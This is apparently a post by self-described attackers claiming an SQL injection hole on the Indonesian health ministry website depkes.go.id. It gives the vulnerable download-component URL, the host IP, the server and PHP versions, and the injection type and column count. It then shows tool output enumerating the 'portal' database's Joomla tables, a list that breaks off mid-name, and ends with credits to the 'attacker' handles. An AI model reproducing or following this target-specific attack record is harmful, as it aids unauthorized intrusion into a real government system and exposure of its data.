SQL Injection Vulnerability on DEPKES.GO.ID

Analyzing http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21
Host IP: 202.70.136.4
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
Keyword Found: Pedoman
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 6
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: portal
Count(table_name) of information_schema.tables Where table_schema=0x706F7274616C is 89
Tables found: jos_assignments,jos_banner,jos_bannerclient,jos_bannertrack,jos_categories,
jos_components,jos_contact_details,jos_content,jos_content_frontpage,
jos_content_rating,jos_core_acl_aro,jos_core_acl_aro_groups,
jos_core_acl_aro_map,jos_core_acl_aro_sections,jos_core_acl_groups_aro_map,
jos_core_log_items,jos_core_log_searches,jos_downloads,jos_downloads_blob,
jos_downloads_category,jos_downloads_classify,jos_downloads_containers,
jos_downloads_file_classify,jos_downloads_files,jos_downloads_folders,
jos_downloads_log,jos_downloads_repository,jos_downloads_reviews,
jos_downloads_structure,jos_downloads_text,jos_groups,jos_hwdvidsantileech,
jos_hwdvidscategories,jos_hwdvidsfavorites,jos_hwdvidsflagged_groups,
jos_hwdvidsflagged_videos,jos_hwdvidsgroup_membership,jos_hwdvidsgroup_videos,
jos_hwdvidsgroups,jos_hwdvidsgs,jos_hwdvidslogs_archive,
jos_hwdvidslogs_favours,jos_hwdvidslogs_views,jos_hwdvidslogs_votes,
jos_hwdvidsplugin,jos_hwdvidsrating,jos_hwdvidsss,jos_hwdvidsvideos,
jos_jdownloads_cats,jos_jdownloads_config,jos_jdown


Vulnerable Founder : TaBUn_GuCi
Pentester : acizninja cyber4rt.
Attacker : Tôniê Ŝniffêr Âttâckêr